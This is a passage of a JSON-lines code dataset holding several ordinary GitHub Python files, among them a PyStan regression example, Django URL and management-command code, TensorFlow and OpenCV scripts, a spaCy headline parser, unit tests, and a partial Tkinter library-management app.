np.random.normal(loc=5, scale=10, size=50)\n\nbayesreg_data = {'N': 50,\n 'x': x,\n 'y': 2.0 * x + 3.0 + np.random.randn(50)}\n\nsm = pystan.StanModel(model_code=bayesreg_code)\nfit = sm.sampling(data=bayesreg_data, iter=1000, chains=4)\n\nprint(fit)\n\nbeta = fit.extract(permuted=True)['beta']\nalpha = fit.extract(permuted=True)['alpha']\nsigma = fit.extract(permuted=True)['sigma']\n\nnp.mean(beta, axis=0)\nnp.mean(alpha, axis=0)\nnp.mean(sigma, axis=0)\n\nfit.plot()\nplt.show()\n", "repo_name": "pnickl/pystan-examples", "sub_path": "pystan_examples/bayesreg.py", "file_name": "bayesreg.py", "file_ext": "py", "file_size_in_byte": 899, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "matplotlib.pyplot.style.use", "line_number": 5, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style", "line_number": 5, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 5, "usage_type": "name"}, {"api_name": "numpy.random.normal", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 28, "usage_type": "attribute"}, {"api_name": "numpy.random.randn", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pystan.StanModel", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}]} +{"seq_id": "4876198838", "text": "from django.conf.urls import patterns, include, url\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom filebrowser.sites import site\n\nadmin.autodiscover()\nfrom content.urls import urlpatterns as content_paterns\n\nurlpatterns = patterns('',\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n (r'^media/(?P.*)$', 'django.views.static.serve',\n {'document_root': settings.MEDIA_ROOT}),\n (r'^static/(?P.*)$', 'django.views.static.serve',\n {'document_root': settings.STATIC_ROOT}),\n\t\t (r'^products/', include('products.urls')), # grappelli URLS\n (r'^grappelli/', include('grappelli.urls')), # grappelli URLS\n (r'^admin/', include(admin.site.urls)), # admin site\n url(r'^admin/filebrowser/', include(site.urls)),\n (r'^tinymce/', include('tinymce.urls')),\n\n\n)\nurlpatterns += content_paterns\n", "repo_name": "gloryofrobots/ferrite_mc", "sub_path": "fmc/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1251, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "django.contrib.admin.autodiscover", "line_number": 8, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 8, "usage_type": "name"}, {"api_name": "django.conf.urls.patterns", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 17, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 17, "usage_type": "name"}, {"api_name": "django.conf.settings.STATIC_ROOT", "line_number": 19, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 19, "usage_type": "name"}, {"api_name": "django.conf.urls.include", "line_number": 20, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 21, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 22, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 22, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 22, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 23, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 23, "usage_type": "call"}, {"api_name": "filebrowser.sites.site.urls", "line_number": 23, "usage_type": "attribute"}, {"api_name": "filebrowser.sites.site", "line_number": 23, "usage_type": "name"}, {"api_name": "django.conf.urls.include", "line_number": 24, "usage_type": "call"}, {"api_name": "content.urls.urlpatterns", "line_number": 28, "usage_type": "name"}]} +{"seq_id": "37574660793", "text": "# -*- coding: utf-8 -*-\n\"\"\"\n@author: 代码医生工作室 \n@公众号:xiangyuejiqiren (内有更多优秀文章及学习资料)\n@来源: <深度学习之TensorFlow工程化项目实战>配套代码 (700+页)\n@配套代码技术支持:bbs.aianaconda.com (有问必答)\n\"\"\"\n\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n#在内存中生成模拟数据\ndef GenerateData(batchsize = 100):\n train_X = np.linspace(-1, 1, batchsize) #train_X为-1到1之间连续的100个浮点数\n train_Y = 2 * train_X + np.random.randn(*train_X.shape) * 0.3 # y=2x,但是加入了噪声\n yield train_X, train_Y #以生成器的方式返回\n\n#定义网络模型结构部分,这里只有占位符张量\nXinput = tf.placeholder(\"float\",(None)) #定义两个占位符,用来接收参数\nYinput = tf.placeholder(\"float\",(None))\n\n#建立会话,获取并输出数据\ntraining_epochs = 20 # 定义需要迭代的次数\nwith tf.Session() as sess: # 建立会话(session)\n for epoch in range(training_epochs): #迭代数据集20遍\n for x, y in GenerateData(): #通过for循环打印所有的点\n xv,yv = sess.run([Xinput,Yinput],feed_dict={Xinput: x, Yinput: y})#通过静态图注入的方式,传入数据\n\n print(epoch,\"| x.shape:\",np.shape(xv),\"| x[:3]:\",xv[:3])\n print(epoch,\"| y.shape:\",np.shape(yv),\"| y[:3]:\",yv[:3])\n \n \n#显示模拟数据点\ntrain_data =list(GenerateData())[0]\nplt.plot(train_data[0], train_data[1], 'ro', label='Original data')\nplt.legend()\nplt.show()", "repo_name": "aianaconda/TensorFlow_Engineering_Implementation", "sub_path": "code/4-1 将模拟数据制作成内存对象数据集.py", "file_name": "4-1 将模拟数据制作成内存对象数据集.py", "file_ext": "py", "file_size_in_byte": 1583, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 222, "dataset": "github-code", "pt": "41", "api": [{"api_name": "numpy.linspace", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.random.randn", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 16, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 20, "usage_type": "call"}, {"api_name": "tensorflow.placeholder", "line_number": 21, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}]} +{"seq_id": "72495045885", "text": "# -*- coding: utf-8 -*-\nimport textwrap\nfrom django.conf import settings\nfrom django.core.management.base import NoArgsCommand\nfrom trytry.core.utils.call import call\n\n\n\n\nclass Command(NoArgsCommand):\n\n help = (\"This command checks whether your current environment is fully \"\n \"conformed with the application requirements\")\n\n def handle_noargs(self, **options):\n self.style.ERR = self.style.NOTICE\n self.style.OK = self.style.SQL_COLTYPE\n self.style.INFO = self.style.SQL_KEYWORD\n\n def _write_line(style, prefix, line):\n chunks = textwrap.wrap(line, break_on_hyphens=False)\n for chunk in chunks:\n self.stdout.write(style(prefix))\n self.stdout.write(style(chunk))\n self.stdout.write('\\n')\n prefix = ' ' * len(prefix)\n\n for k in dir(self):\n if k.startswith('check_'):\n v = getattr(self, k)\n if not callable(v):\n continue\n out = v()\n if not out:\n continue # test is not applicable\n status, result = out\n test_name = v.__doc__ and v.__doc__.strip() + ': ' or ''\n line = '{0}{1}'.format(test_name, result)\n if status is True:\n _write_line(self.style.OK, '[ OK ] ', line)\n elif status is False:\n _write_line(self.style.ERR, '[ ERR] ', line)\n else:\n _write_line(self.style.INFO, '[INFO] ', line)\n\n def check_sudo(self):\n \"\"\" Sudo support \"\"\"\n _, _, code = call('sudo whoami')\n reason = 'Feature is required to support LXC'\n if code == 0:\n return ok('User can execute command with sudo. {0}'.format(reason))\n else:\n if settings.TRYTRY_LXC_ENABLED:\n return err('User CANNOT execute command with sudo. {0}'.format(reason))\n else:\n return info('User cannot execute command with sudo. {0}'.format(reason))\n\n\n def check_lxc_enabled(self):\n enabled = 'enabled' if settings.TRYTRY_LXC_ENABLED else 'disabled'\n return info('You have settings.TRYTRY_LXC_ENABLED variable {0}. '\n 'You can change its value in your localsettings.py'.format(enabled))\n\n\n def check_timelimit(self):\n \"\"\" Command timelimit \"\"\"\n out, _, code = call('which timelimit')\n reason = ('This command is used to limit the maximum time span '\n 'of command execution. ')\n if code == 0:\n return ok('Command {0} found. {1}'.format(out, reason))\n else:\n return err('Command \"timelimit\" is not found. {0}'\n 'Ubuntu and Debian users can set it up with '\n '\"apt-get install timeline\"'.format(reason))\n\n def check_lxc_commands(self):\n \"\"\" LXC userspace support \"\"\"\n if settings.TRYTRY_LXC_ENABLED:\n out, _, code = call('which lxc')\n reason = 'This command is the indicator whether the LXC module is set up'\n if code == 0:\n return ok('Command {0} found. {1}'.format(out, reason))\n else:\n return err('Command \"lxc\" is not found. {0}. Ubuntu and Debian '\n 'users can set it up with \"apt-get install lxc\". See '\n 'http://try-try.readthedocs.org/en/latest/lxc.html '\n 'for more details'.format(reason))\n\ndef ok(text):\n return (True, text)\n\ndef err(text):\n return (False, text)\n\ndef info(text):\n return (None, text)\n", "repo_name": "imankulov/trytry", "sub_path": "trytry/core/management/commands/trytry_sanity_check.py", "file_name": "trytry_sanity_check.py", "file_ext": "py", "file_size_in_byte": 3680, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "41", "api": [{"api_name": "django.core.management.base.NoArgsCommand", "line_number": 10, "usage_type": "name"}, {"api_name": "textwrap.wrap", "line_number": 21, "usage_type": "call"}, {"api_name": "trytry.core.utils.call.call", "line_number": 48, "usage_type": "call"}, {"api_name": "django.conf.settings.TRYTRY_LXC_ENABLED", "line_number": 53, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 53, "usage_type": "name"}, {"api_name": "django.conf.settings.TRYTRY_LXC_ENABLED", "line_number": 60, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 60, "usage_type": "name"}, {"api_name": "trytry.core.utils.call.call", "line_number": 67, "usage_type": "call"}, {"api_name": "django.conf.settings.TRYTRY_LXC_ENABLED", "line_number": 79, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 79, "usage_type": "name"}, {"api_name": "trytry.core.utils.call.call", "line_number": 80, "usage_type": "call"}]} +{"seq_id": "13787472220", "text": "import cv2\r\n\r\ncap = cv2.VideoCapture('video8.mp4')\r\n\r\nwhile not cap.isOpened():\r\n pass\r\n\r\nfps = int(cap.get(cv2.CAP_PROP_FPS))\r\nwidth = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\r\nheight = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\r\n\r\noutput_filename = 'output_video.mp4'\r\nfourcc = cv2.VideoWriter_fourcc(*'XVID')\r\nout = cv2.VideoWriter(output_filename, fourcc, fps, (width, height))\r\n\r\nwhile True:\r\n ret, frame = cap.read()\r\n if not ret:\r\n break\r\n\r\n cv2.putText(frame, f\"Width: {width}, Height: {height}, FPS: {fps}\",\r\n (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 2)\r\n cv2.namedWindow('Video', cv2.WINDOW_NORMAL)\r\n cv2.imshow('Video', frame)\r\n\r\n out.write(frame) # Çıktı videoya kareyi yaz\r\n\r\n if cv2.waitKey(1) & 0xFF == ord('w'):\r\n break\r\n\r\ncap.release()\r\nout.release() # Çıktı videoyu serbest bırak\r\ncv2.destroyAllWindows()\r\n", "repo_name": "nisanuralici/gitek_internship", "sub_path": "Video_okuma_fps_height_width_degerleri/videookuma.py", "file_name": "videookuma.py", "file_ext": "py", "file_size_in_byte": 896, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "cv2.VideoCapture", "line_number": 3, "usage_type": "call"}, {"api_name": "cv2.CAP_PROP_FPS", "line_number": 8, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FRAME_WIDTH", "line_number": 9, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FRAME_HEIGHT", "line_number": 10, "usage_type": "attribute"}, {"api_name": "cv2.VideoWriter_fourcc", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.VideoWriter", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 22, "usage_type": "attribute"}, {"api_name": "cv2.namedWindow", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.WINDOW_NORMAL", "line_number": 23, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 33, "usage_type": "call"}]} +{"seq_id": "26268402319", "text": "\n\nimport re\nimport spacy\nimport os\n\nfrom spacy.tokens import Token, Span, Doc\nfrom functools import reduce\nfrom boltons.iterutils import pairwise\n\n\ndef load_blocklist(path):\n \"\"\"Read block list, or empty set.\n \"\"\"\n try:\n with open(path) as fh:\n return set(fh.read().splitlines())\n\n except:\n return set()\n\n\nBLOCKLIST_PATH = os.path.join(os.path.dirname(__file__), 'blocklist.txt')\nBLOCKLIST = load_blocklist(BLOCKLIST_PATH)\n\n\n# TODO: What to do with \"/\"?\n\n\nQUOTES = (('“', '\"'), ('”', '\"'), ('‘', \"'\"), ('’', \"'\"))\n\ndef standardize_quotes(text):\n \"\"\"Curly -> straight.\n \"\"\"\n for special, standard in QUOTES:\n text = text.replace(special, standard)\n\n return text\n\n\n# http://jkorpela.fi/dashes.html\nHYPHENS = {u'\\u002D', u'\\u2010', u'\\u2011', u'\\u2212', u'\\uFE63'}\n\ndef standardize_hyphens(text):\n \"\"\"Hyphen variants -> \"-\".\n \"\"\"\n for h in HYPHENS:\n text = text.replace(h, '-')\n\n # Drop infix hyphens.\n text = re.sub('([^\\s])-([^\\s])', r'\\1 \\2', text)\n\n return text\n\n\ndef standardize_and(text):\n return text.replace(' & ', ' and ')\n\n\ndef drop_twitter_chars(text):\n return re.sub('[@#]', '', text)\n\n\nSTANDARDIZERS = (\n standardize_quotes,\n standardize_hyphens,\n standardize_and,\n drop_twitter_chars,\n)\n\ndef standardize_text(text):\n return reduce(lambda t, func: func(t), STANDARDIZERS, text)\n\n\n# Headlines can contain letters, digits, \".,;\", \"?!\", \"$%,\"\" and spaces.\nBREAK_CHAR_PATTERN = '[^a-z0-9\\s\\.,;\\?!\\'\"\\$%]'\n\n# Regular tokens that constitute a break.\nALPHA_BREAK_TOKENS = {'via'}\n\ndef is_break_token(token):\n \"\"\"Does the token constitute a \"sentence\" break?\n \"\"\"\n text = token.text.lower()\n\n has_break_char = bool(re.search(BREAK_CHAR_PATTERN, text))\n is_alpha_break_token = text in ALPHA_BREAK_TOKENS\n\n return has_break_char or is_alpha_break_token\n\n\n# For the classifier, drop everything except letters, numbers, and $.\nCLF_REMOVED_CHAR_PATTERN = '[^a-z0-9\\$%]'\n\ndef token_clf_text(token):\n \"\"\"Drop everything but letters, numbers, and currency ($.,)\n \"\"\"\n # Drop everything but letters, numbers, $.\n text = re.sub(CLF_REMOVED_CHAR_PATTERN, '', token.text.lower())\n\n # Digits -> '#'.\n text = re.sub('[0-9]+', '#', text)\n\n return text\n\n\ndef span_clf_text(span):\n return ' '.join(t._.clf_text for t in span if t._.clf_text).strip()\n\n\ndef break_idxs(doc):\n \"\"\"Locations of break tokens, with left/right bookends.\n \"\"\"\n return [-1, *[t.i for t in doc if t._.is_break_token], len(doc)]\n\n\ndef spans(doc):\n \"\"\"Pull apart separator-delimited spans.\n \"\"\"\n return [doc[i1+1:i2] for i1, i2 in pairwise(doc._.break_idxs)]\n\n\ndef span_clf_texts(doc):\n \"\"\"Join spans -> clf strings, drop empty strings.\n \"\"\"\n texts = [span._.clf_text for span in doc._.spans]\n return tuple(filter(bool, texts))\n\n\ndef longest_unbroken_span(doc):\n \"\"\"Find the longest span of tokens without a break token.\n \"\"\"\n return sorted(doc._.spans, key=lambda s: len(s), reverse=True)[0]\n\n\ndef clf_tokens(doc):\n \"\"\"Get filtered tokens for classifier.\n \"\"\"\n return [\n token\n for span in doc._.spans\n if span._.clf_text and span._.clf_text not in BLOCKLIST\n for token in span\n if token._.clf_text\n ]\n\n\ndef clf_token_texts(doc):\n return [t._.clf_text for t in doc._.clf_tokens]\n\n\nToken.set_extension('is_break_token', getter=is_break_token)\nToken.set_extension('clf_text', getter=token_clf_text)\n\nSpan.set_extension('clf_text', getter=span_clf_text)\n\nDoc.set_extension('break_idxs', getter=break_idxs)\nDoc.set_extension('spans', getter=spans)\nDoc.set_extension('span_clf_texts', getter=span_clf_texts)\nDoc.set_extension('longest_unbroken_span', getter=longest_unbroken_span)\nDoc.set_extension('clf_tokens', getter=clf_tokens)\nDoc.set_extension('clf_token_texts', getter=clf_token_texts)\n\nnlp = spacy.load('en', disable=['ner', 'parser', 'tagger'])\n\n\ndef parse_headline(text):\n return nlp(standardize_text(text))\n", "repo_name": "davidmcclure/headline-parser", "sub_path": "headline_parser.py", "file_name": "headline_parser.py", "file_ext": "py", "file_size_in_byte": 4014, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "os.path.join", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 23, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 51, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 61, "usage_type": "call"}, {"api_name": "functools.reduce", "line_number": 72, "usage_type": "call"}, {"api_name": "re.search", "line_number": 86, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 99, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 102, "usage_type": "call"}, {"api_name": "boltons.iterutils.pairwise", "line_number": 120, "usage_type": "call"}, {"api_name": "spacy.tokens.Token.set_extension", "line_number": 152, "usage_type": "call"}, {"api_name": "spacy.tokens.Token", "line_number": 152, "usage_type": "name"}, {"api_name": "spacy.tokens.Token.set_extension", "line_number": 153, "usage_type": "call"}, {"api_name": "spacy.tokens.Token", "line_number": 153, "usage_type": "name"}, {"api_name": "spacy.tokens.Span.set_extension", "line_number": 155, "usage_type": "call"}, {"api_name": "spacy.tokens.Span", "line_number": 155, "usage_type": "name"}, {"api_name": "spacy.tokens.Doc.set_extension", "line_number": 157, "usage_type": "call"}, {"api_name": "spacy.tokens.Doc", "line_number": 157, "usage_type": "name"}, {"api_name": "spacy.tokens.Doc.set_extension", "line_number": 158, "usage_type": "call"}, {"api_name": "spacy.tokens.Doc", "line_number": 158, "usage_type": "name"}, {"api_name": "spacy.tokens.Doc.set_extension", "line_number": 159, "usage_type": "call"}, {"api_name": "spacy.tokens.Doc", "line_number": 159, "usage_type": "name"}, {"api_name": "spacy.tokens.Doc.set_extension", "line_number": 160, "usage_type": "call"}, {"api_name": "spacy.tokens.Doc", "line_number": 160, "usage_type": "name"}, {"api_name": "spacy.tokens.Doc.set_extension", "line_number": 161, "usage_type": "call"}, {"api_name": "spacy.tokens.Doc", "line_number": 161, "usage_type": "name"}, {"api_name": "spacy.tokens.Doc.set_extension", "line_number": 162, "usage_type": "call"}, {"api_name": "spacy.tokens.Doc", "line_number": 162, "usage_type": "name"}, {"api_name": "spacy.load", "line_number": 164, "usage_type": "call"}]} +{"seq_id": "23951933030", "text": "import logging\nimport os\nimport unittest\n\nimport yaml\nfrom unittest.mock import patch\n\nfrom ISR import assistant\n\n\nclass Object:\n def __init__(self, *args, **kwargs):\n self.scale = 0\n self.patch_size = 0\n pass\n \n def make_model(self, *args, **kwargs):\n return self\n \n def train(self, *args, **kwargs):\n return True\n \n def get_predictions(self, *args, **kwargs):\n return True\n\n\nclass RunFunctionTest(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n logging.disable(logging.CRITICAL)\n conf = yaml.load(open(os.path.join('tests', 'data', 'config.yml'), 'r'))\n conf['default'] = {\n 'feature_extractor': False,\n 'discriminator': False,\n 'generator': 'rdn',\n 'training_set': 'test',\n 'test_set': 'test',\n }\n conf['session'] = {}\n conf['session']['training'] = {}\n conf['session']['training']['patch_size'] = 0\n conf['session']['training']['epochs'] = 0\n conf['session']['training']['steps_per_epoch'] = 0\n conf['session']['training']['batch_size'] = 0\n conf['session']['prediction'] = {}\n conf['session']['prediction']['patch_size'] = 5\n conf['generators'] = {}\n conf['generators']['rdn'] = {}\n conf['generators']['rdn']['x'] = 0\n conf['training_sets'] = {}\n conf['training_sets']['test'] = {}\n conf['training_sets']['test']['lr_train_dir'] = None\n conf['training_sets']['test']['hr_train_dir'] = None\n conf['training_sets']['test']['lr_valid_dir'] = None\n conf['training_sets']['test']['hr_valid_dir'] = None\n conf['loss_weights'] = None\n conf['training_sets']['test']['data_name'] = None\n conf['log_dirs'] = {}\n conf['log_dirs']['logs'] = None\n conf['log_dirs']['weights'] = None\n conf['weights_paths'] = {}\n conf['weights_paths']['generator'] = 'a/path/rdn-C1-D6-G1-G02-x0-weights.hdf5'\n conf['weights_paths']['discriminator'] = 'a/path/rdn-weights.hdf5'\n conf['session']['training']['n_validation_samples'] = None\n conf['session']['training']['metrics'] = None\n conf['session']['training']['learning_rate'] = {}\n conf['session']['training']['adam_optimizer'] = None\n conf['session']['training']['flatness'] = None\n conf['session']['training']['fallback_save_every_n_epochs'] = None\n conf['session']['training']['monitored_metrics'] = None\n conf['losses'] = None\n cls.conf = conf\n \n @classmethod\n def tearDownClass(cls):\n pass\n \n def setUp(self):\n pass\n \n def tearDown(self):\n pass\n \n @patch('ISR.assistant._get_module', return_value=Object())\n @patch('ISR.train.trainer.Trainer', return_value=Object())\n def test_run_arguments_trainer(self, trainer, _get_module):\n with patch('yaml.load', return_value=self.conf):\n assistant.run(\n config_file='tests/data/config.yml', training=True, prediction=False, default=True\n )\n trainer.assert_called_once()\n \n @patch('ISR.assistant._get_module', return_value=Object())\n @patch('ISR.predict.predictor.Predictor', return_value=Object())\n def test_run_arguments_predictor(self, predictor, _get_module):\n with patch('yaml.load', return_value=self.conf):\n assistant.run(\n config_file='tests/data/config.yml', training=False, prediction=True, default=True\n )\n predictor.assert_called_once()\n", "repo_name": "idealo/image-super-resolution", "sub_path": "tests/assistant/test_assistant.py", "file_name": "test_assistant.py", "file_ext": "py", "file_size_in_byte": 3597, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4348, "dataset": "github-code", "pt": "41", "api": [{"api_name": "unittest.TestCase", "line_number": 27, "usage_type": "attribute"}, {"api_name": "logging.disable", "line_number": 30, "usage_type": "call"}, {"api_name": "logging.CRITICAL", "line_number": 30, "usage_type": "attribute"}, {"api_name": "yaml.load", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "unittest.mock.patch", "line_number": 87, "usage_type": "call"}, {"api_name": "ISR.assistant.run", "line_number": 88, "usage_type": "call"}, {"api_name": "ISR.assistant", "line_number": 88, "usage_type": "name"}, {"api_name": "unittest.mock.patch", "line_number": 84, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 85, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 96, "usage_type": "call"}, {"api_name": "ISR.assistant.run", "line_number": 97, "usage_type": "call"}, {"api_name": "ISR.assistant", "line_number": 97, "usage_type": "name"}, {"api_name": "unittest.mock.patch", "line_number": 93, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 94, "usage_type": "call"}]} +{"seq_id": "22802590357", "text": "from tkinter import *\r\nfrom tkinter import ttk\r\nimport datetime\r\nfrom tkinter import messagebox\r\nimport tkinter\r\nimport mysql.connector\r\n\r\n\r\n\r\n\r\nclass LibraryMangementSystem:\r\n def __init__(self, root):\r\n self.root = root\r\n self.root.title(\"Library Management System\")\r\n self.root.geometry(\"1500x800\")\r\n \r\n #=============Variable==================\r\n \r\n self.member=StringVar()\r\n self.prn=StringVar()\r\n self.id=StringVar()\r\n self.firstname=StringVar()\r\n self.lastname=StringVar()\r\n self.adress1=StringVar()\r\n self.adress2=StringVar()\r\n self.postcode=StringVar()\r\n self.mobile=StringVar()\r\n self.bookid=StringVar()\r\n self.booktittle=StringVar()\r\n self.author=StringVar()\r\n self.dateborrowed=StringVar()\r\n self.datedue=StringVar()\r\n self.daysonbook=StringVar()\r\n self.latefine=StringVar()\r\n self.dateoverdue=StringVar()\r\n self.finalprice=StringVar()\r\n \r\n \r\n #=======================================================================================================================\r\n\r\n lbltitle = Label(self.root, bd=20, relief=RIDGE, text=\"Library Management System\",\r\n fg=\"maroon\", bg=\"powder blue\", font=(\"times new roman\", 50, \"bold\"))\r\n lbltitle.pack(side=TOP, fill=X)\r\n\r\n # ==================DATA FRAME==================\r\n DataFrame = Frame(self.root, bd=20, relief=RIDGE,bg=\"powder blue\")\r\n DataFrame.place(x=0, y=130, width=1530, height=400)\r\n\r\n DataFrameLeft = LabelFrame(DataFrame, bd=10, relief=RIDGE, padx=10,\r\n font=(\"times new roman\", 12, \"bold\"), text=\"Library Members\")\r\n DataFrameLeft.place(x=0, y=5, width=910, height=350)\r\n\r\n DataFrameRight = LabelFrame(DataFrame, bd=10, relief=RIDGE, padx=10,\r\n font=(\"times new roman\", 12, \"bold\"), text=\"Book Details\")\r\n DataFrameRight.place(x=930, y=5, width=530, height=350)\r\n\r\n # ================Buttons Frame===================\r\n\r\n ButtonFrame = Frame(self.root, bd=20, relief=RIDGE,\r\n padx=20, bg=\"powder blue\")\r\n ButtonFrame.place(x=0, y=530, width=1530, height=70)\r\n\r\n # ================Details Frame===================\r\n\r\n DetailsFrame = Frame(self.root, bd=20, relief=RIDGE, padx=2)\r\n DetailsFrame.place(x=0, y=600, width=1530, height=190)\r\n \r\n \r\n \r\n\r\n # ================Data Frame Left===================\r\n \r\n \r\n\r\n lblMember = Label(DataFrameLeft, font=(\r\n \"arial\", 12, \"bold\"),text=\"Member\", padx=2)\r\n lblMember.grid(row=0, column=0)\r\n\r\n comMember = ttk.Combobox(\r\n DataFrameLeft, state=\"readonly\", font=(\"arial\", 12, \"bold\"),textvariable=self.member, width=33)\r\n comMember[\"values\"] = (\"Admin\", \"Student\", \"Teacher\")\r\n comMember.current(0)\r\n comMember.grid(row=0, column=1)\r\n\r\n lblPrn = Label(DataFrameLeft, font=(\r\n \"arial\", 12, \"bold\"), text=\"Reg Number \", padx=2)\r\n lblPrn.grid(row=1, column=0, sticky=W)\r\n txtPrn = Entry(DataFrameLeft, font=(\"arial\", 13, \"bold\"),textvariable=self.prn, width=35)\r\n txtPrn.grid(row=1, column=1)\r\n\r\n lblIdNo = Label(DataFrameLeft, font=(\"arial\", 12, \"bold\"),\r\n text=\"Id Number \", padx=2, pady=4)\r\n lblIdNo.grid(row=2, column=0, sticky=W)\r\n txtIdNo = Entry(DataFrameLeft, font=(\"arial\", 13, \"bold\"),textvariable=self.id, width=35)\r\n txtIdNo.grid(row=2, column=1)\r\n\r\n lblFirstName = Label(DataFrameLeft, font=(\r\n \"arial\", 12, \"bold\"), text=\"First Name \", padx=2, pady=6)\r\n lblFirstName.grid(row=3, column=0, sticky=W)\r\n txtFirstName = Entry(DataFrameLeft, font=(\r\n \"arial\", 13, \"bold\"),textvariable=self.firstname, width=35)\r\n txtFirstName.grid(row=3, column=1)\r\n\r\n lblLastName = Label(DataFrameLeft, font=(\r\n \"arial\", 12, \"bold\"),text=\"Last Name \", padx=2, pady=6)\r\n lblLastName.grid(row=4, column=0, sticky=W)\r\n txtLastName = Entry(DataFrameLeft, font=(\r\n \"arial\", 13, \"bold\"),textvariable=self.lastname , width=35)\r\n txtLastName.grid(row=4, column=1)\r\n\r\n lblAddress1 = Label(DataFrameLeft, font=(\r\n \"arial\", 12, \"bold\"), text=\"Address1\", padx=2, pady=6)\r\n lblAddress1.grid(row=5, column=0, sticky=W)\r\n txtAddress1 = Entry(DataFrameLeft, font=(\r\n \"arial\", 13, \"bold\"),textvariable=self.adress1, width=35)\r\n txtAddress1.grid(row=5, column=1)\r\n\r\n lblAddress2 = Label(DataFrameLeft, font=(\r\n \"arial\", 12, \"bold\"), text=\"Address2 \", padx=2, pady=6)\r\n lblAddress2.grid(row=6, column=0, sticky=W)\r\n txtAddress2 = Entry(DataFrameLeft, font=(\r\n \"arial\", 13, \"bold\"),textvariable=self.adress2, width=35)\r\n txtAddress2.grid(row=6, column=1)\r\n\r\n lblPostCode = Label(DataFrameLeft, font=(\r\n \"arial\", 12, \"bold\"), text=\"Post Code \", padx=2, pady=4)\r\n lblPostCode.grid(row=7, column=0, sticky=W)\r\n txtPostCode = Entry(DataFrameLeft, font=(\r\n \"arial\", 13, \"bold\"),textvariable=self.postcode, width=35)\r\n txtPostCode.grid(row=7, 